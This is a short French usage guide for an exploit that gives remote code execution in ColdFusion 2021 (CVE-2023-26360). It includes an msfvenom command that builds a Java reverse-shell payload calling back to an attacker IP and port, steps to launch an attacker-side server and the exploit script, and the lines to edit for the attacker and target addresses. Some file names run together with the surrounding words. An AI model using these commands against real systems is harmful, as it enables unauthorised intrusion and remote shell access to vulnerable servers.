
Exploit pour l'exécution de code à distance dans ColdFusion 2021 (CVE-2023-26360)
Parfois, les scripts ne fonctionnent pas du premier coup. Essayez plusieurs fois pour que cela fonctionne
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py, il doit donc être initialisé en premier.python3 server.py 8000
L'argument 8000 est le port sur lequel le serveur écoutera.
Il est important de noter que la ligne 12 configure l'adresse IP du serveur, alors modifiez-la :
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Comme pour server.py, l'argument 8000 est le port sur lequel server.py écoutera. Il doit donc être identique dans les deux commandes.
La ligne 8 de cve-2023-26360.py définit l'adresse IP sur laquelle server.py écoutera. Il est nécessaire de la configurer correctement.
La ligne 11 de cve-2023-26360.py définit l'adresse IP du serveur ColdFusion, modifiez-la donc :
url = "http://192.168.56.102:8500"